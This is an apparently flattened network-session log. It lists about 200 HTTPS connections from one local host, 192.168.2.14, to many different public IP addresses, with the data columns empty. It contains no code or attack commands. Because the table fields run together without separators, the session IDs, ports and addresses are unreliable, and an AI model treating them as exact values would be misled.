                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10689192.168.2.144978846.110.10.170443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10690192.168.2.1453808195.102.82.113443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10691192.168.2.1453692216.110.223.90443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10692192.168.2.1433164221.226.121.2443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10693192.168.2.144137876.206.176.155443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10694192.168.2.1452228115.69.249.208443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10695192.168.2.1441964157.99.118.170443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10696192.168.2.1440906198.56.184.54443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10697192.168.2.145606476.26.139.24443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10698192.168.2.144962250.240.243.55443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10699192.168.2.145346066.194.25.193443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10700192.168.2.144137491.41.108.165443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10701192.168.2.1441190173.21.74.20443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10702192.168.2.143802438.193.95.9443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10703192.168.2.145589443.57.221.133443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10704192.168.2.1441556101.11.107.132443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10705192.168.2.143895487.229.215.9443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10706192.168.2.143772466.220.42.207443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10707192.168.2.145226097.144.138.128443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10708192.168.2.145505665.101.186.69443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10709192.168.2.1455834176.101.157.55443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10710192.168.2.1438702199.143.117.184443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10711192.168.2.1449846141.131.188.38443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10712192.168.2.1453884128.200.9.124443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10713192.168.2.1437142197.49.186.162443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10714192.168.2.1442696138.69.2.7443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10715192.168.2.144249252.75.194.92443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10716192.168.2.1447080151.139.223.136443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10717192.168.2.1460544171.217.217.146443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10718192.168.2.144426294.219.60.106443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10719192.168.2.1457846162.72.110.198443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10720192.168.2.145516675.91.248.122443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10721192.168.2.144455024.28.95.1443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10722192.168.2.1455136218.79.120.106443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10723192.168.2.1441316210.235.24.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10724192.168.2.1450860192.95.85.176443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10725192.168.2.1460600109.42.51.37443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10726192.168.2.145125873.244.54.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10727192.168.2.1450298178.30.50.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10728192.168.2.1460514114.42.26.136443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10729192.168.2.1438292165.106.163.97443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10730192.168.2.1448780164.246.149.151443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10731192.168.2.145376443.234.174.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10732192.168.2.145224817.222.76.193443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10733192.168.2.1433048133.59.17.29443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10734192.168.2.1435458216.70.163.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10735192.168.2.1456132209.107.162.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10736192.168.2.1451266157.174.190.226443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10737192.168.2.1434190178.144.250.83443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10738192.168.2.1443670113.200.141.235443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10739192.168.2.1447864117.152.193.61443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10740192.168.2.1454594192.246.246.197443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10741192.168.2.1446964162.29.237.179443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10742192.168.2.1453414191.55.143.117443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10743192.168.2.145598636.233.119.131443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10744192.168.2.144818687.124.174.234443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10745192.168.2.1433566186.174.227.207443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10746192.168.2.144439068.185.99.190443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10747192.168.2.1458774201.241.67.199443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10748192.168.2.144615419.118.10.247443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10749192.168.2.144808666.44.23.175443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10750192.168.2.1441366166.125.241.146443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10751192.168.2.143984835.52.128.28443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10752192.168.2.1459660143.70.128.98443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10753192.168.2.1453186222.105.102.4443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10754192.168.2.145010847.231.63.7443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10755192.168.2.1460790123.28.204.171443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10756192.168.2.145898219.112.195.232443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10757192.168.2.1447152184.42.146.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10758192.168.2.144416849.73.79.228443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10759192.168.2.145176091.249.74.44443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10760192.168.2.1450088107.52.30.72443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10761192.168.2.1446826135.253.175.185443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10762192.168.2.146089469.134.58.7443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10763192.168.2.144972824.55.106.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10764192.168.2.143600883.44.1.225443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10765192.168.2.143455886.155.128.73443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10766192.168.2.1453450131.98.108.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10767192.168.2.1460398108.31.169.241443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10768192.168.2.1452724205.79.131.83443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10769192.168.2.145947468.206.248.207443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10770192.168.2.143701093.11.151.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10771192.168.2.1437690142.67.78.16443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10772192.168.2.145810817.152.144.244443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10773192.168.2.1441398102.144.20.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10774192.168.2.1448510194.200.14.177443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10775192.168.2.145953831.99.220.91443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10776192.168.2.145387443.104.225.135443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10777192.168.2.1447418138.24.34.28443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10778192.168.2.145338244.159.79.199443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10779192.168.2.1457528191.246.1.40443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10780192.168.2.1446658177.135.217.178443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10781192.168.2.1442782205.134.29.167443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10782192.168.2.1442258163.115.176.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10783192.168.2.1443820150.100.16.8443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10784192.168.2.1443922192.132.253.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10785192.168.2.1435704195.199.142.140443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10786192.168.2.145968227.255.118.229443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10787192.168.2.1439324181.235.177.119443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10788192.168.2.1455452156.63.84.132443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10789192.168.2.1460200113.19.97.78443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10790192.168.2.1452132159.18.56.236443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10791192.168.2.1440690191.221.159.220443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10792192.168.2.143854046.194.111.112443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10793192.168.2.143841683.161.82.67443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10794192.168.2.1447800168.23.202.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10795192.168.2.1455472121.66.16.89443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10796192.168.2.144082631.166.113.9443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10797192.168.2.1451056177.196.248.185443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10798192.168.2.1442264111.117.102.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10799192.168.2.144176878.104.143.13443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10800192.168.2.1433448173.196.249.137443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10801192.168.2.1438534210.97.235.10443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10802192.168.2.145322684.152.109.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10803192.168.2.1456672218.254.124.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10804192.168.2.1453446170.33.130.172443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10805192.168.2.1457798199.69.167.63443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10806192.168.2.145474814.28.61.26443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10807192.168.2.1433516119.63.47.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10808192.168.2.1455472175.170.216.36443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10809192.168.2.14600708.94.38.241443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10810192.168.2.146012871.251.145.199443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10811192.168.2.1460366168.115.247.198443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10812192.168.2.143678862.148.163.102443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10813192.168.2.14573721.103.116.72443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10814192.168.2.1435874197.125.185.40443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10815192.168.2.1448346142.176.255.123443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10816192.168.2.14512385.193.224.151443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10817192.168.2.145174289.222.149.230443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10818192.168.2.1441242184.10.228.39443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10819192.168.2.14563908.49.153.176443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10820192.168.2.144480031.163.246.53443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10821192.168.2.1452860212.133.63.28443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10822192.168.2.1456796191.46.88.177443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10823192.168.2.1459308223.37.208.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10824192.168.2.144730625.5.126.233443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10825192.168.2.144951634.40.15.126443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10826192.168.2.145959470.108.206.251443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10827192.168.2.1446894118.41.93.4443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10828192.168.2.1436292201.111.147.2443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10829192.168.2.1443552176.103.56.107443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10830192.168.2.1456294188.110.126.143443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10831192.168.2.144801081.135.214.192443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10832192.168.2.145349038.244.176.3443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10833192.168.2.145842093.194.197.73443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10834192.168.2.1455906116.254.241.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10835192.168.2.144768036.55.180.52443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10836192.168.2.144622070.31.134.184443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10837192.168.2.143975079.49.134.126443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10838192.168.2.1442212220.241.181.176443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10839192.168.2.1458530136.242.48.64443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10840192.168.2.144158479.6.255.211443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10841192.168.2.144010437.225.111.8443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10842192.168.2.143949890.66.73.120443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10843192.168.2.143567677.243.40.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10844192.168.2.1450076163.77.254.153443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10845192.168.2.145050237.119.134.139443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10846192.168.2.14569285.201.83.65443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10847192.168.2.1435126219.22.233.225443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10848192.168.2.144041072.248.20.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10849192.168.2.143629891.214.147.202443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10850192.168.2.1437520103.181.197.192443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10851192.168.2.1434362200.56.116.184443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10852192.168.2.1443616129.26.84.189443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10853192.168.2.1442162181.125.155.74443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10854192.168.2.1433362208.192.195.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10855192.168.2.145723254.21.96.115443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10856192.168.2.1442076106.180.143.232443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10857192.168.2.1433460170.248.124.118443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10858192.168.2.1453616150.166.177.114443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10859192.168.2.1457412175.154.136.209443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10860192.168.2.145580664.97.217.126443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10861192.168.2.145259664.155.237.115443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10862192.168.2.1434570133.20.112.72443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10863192.168.2.1451402160.205.112.166443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10864192.168.2.1444916142.8.225.66443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10865192.168.2.1455586128.2.53.229443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10866192.168.2.144186641.64.28.6443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10867192.168.2.1445906144.211.121.144443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10868192.168.2.1449392176.47.13.191443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10869192.168.2.145404494.214.87.162443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10870192.168.2.1455140135.9.198.38443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10871192.168.2.1460424210.100.15.61443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10872192.168.2.1433192147.167.70.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10873192.168.2.1459018213.179.136.220443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10874192.168.2.1444882185.161.106.1443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10875192.168.2.1451998182.209.94.198443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10876192.168.2.1436982164.18.103.23443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10877192.168.2.1442276108.31.200.59443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10878192.168.2.14479584.122.196.43443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10879192.168.2.144673242.126.179.81443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10880192.168.2.145129243.169.129.136443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10881192.168.2.1439836184.28.163.236443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10882192.168.2.1443480173.63.127.125443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10883192.168.2.1445490107.161.130.85443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10884192.168.2.145520667.69.37.180443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10885192.168.2.1441790123.103.44.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10886192.168.2.144190474.104.96.199443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10887192.168.2.145948493.46.106.103443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10888192.168.2.145668083.192.49.109443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10889192.168.2.1440122198.62.13.148443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10890192.168.2.144474068.222.245.129443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10891192.168.2.145368013.9.47.36443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10892192.168.2.145698838.182.175.111443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10893192.168.2.1435736170.48.59.136443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10894192.168.2.143634061.4.251.83443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10895192.168.2.1454712205.118.10.130443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10896192.168.2.1455956156.186.240.60443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10897192.168.2.1444846188.60.233.30443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10898192.168.2.1448946211.39.251.192443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10899192.168.2.1439848107.83.157.68443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10900192.168.2.144046892.234.168.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
